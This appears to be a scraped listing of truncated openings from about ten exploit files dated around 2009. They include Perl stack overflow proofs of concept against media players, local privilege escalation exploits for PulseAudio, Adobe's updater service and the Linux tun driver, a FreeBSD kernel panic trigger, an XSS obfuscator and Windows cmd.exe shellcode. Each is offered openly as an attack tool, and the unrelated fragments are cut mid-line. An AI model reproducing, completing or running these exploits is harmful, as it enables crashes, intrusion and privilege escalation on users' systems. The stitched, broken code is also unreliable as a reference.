#!/usr/bin/perl #Medieval CUE Splitter Local Stack Overflow PoC # By ViRuS_HaCkErS # Big THnx to THE DOOM FINAL BLUE HACKER ALL SPIDERS TEAM # down: http://www.medieval.it/sw/cuesplitter_setup.exe my $header1= x46x49x4cx45x20x22; my $header2=
PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp (or change config.h). Must be on same f
/* pecoff_panic.c * * by Shaun Colley, 20 July 2009 * * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`) * * panic(9) is in vm_fault due to a
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group site: http://retrogod.altervista.org/ description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x
xssjo.htm !-- XSS JavaScript Obfuscator 0.01A Copyright (C) 2009 John Leitch john.leitch5@gmail.com This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free So
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable :) Also, bypass of mmap_min_addr via SELinux
#Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh) #First:http://milw0rm.com/exploits/8624 #By: ThE g0bL!N my $crash=x41 x 5000 ; # just random open(myfile,'UI.txt') ; print myfile $crash; # Usage: After Clicking On file Perl Copy TXT Fi
#Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh) #By: ThE g0bL!N my $crash=x41 x 5000 ; # just random open(myfile,'UI.txt') print myfile $crash; # Usage: After Clicking On file Perl Copy TXT File on this Diredtory skindefault Then
/* win32/xp sp2 (En) cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with olly debugger 0040200
#!/usr/bin/perl # Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit # it's so diferent to the first exploit .pls # by stack # xd Alpha zrebti 3liha :d # Thnx to Zigma His0k4 HOD my $header= x23x45x58x54x4Dx33x55x0Dx0Ax23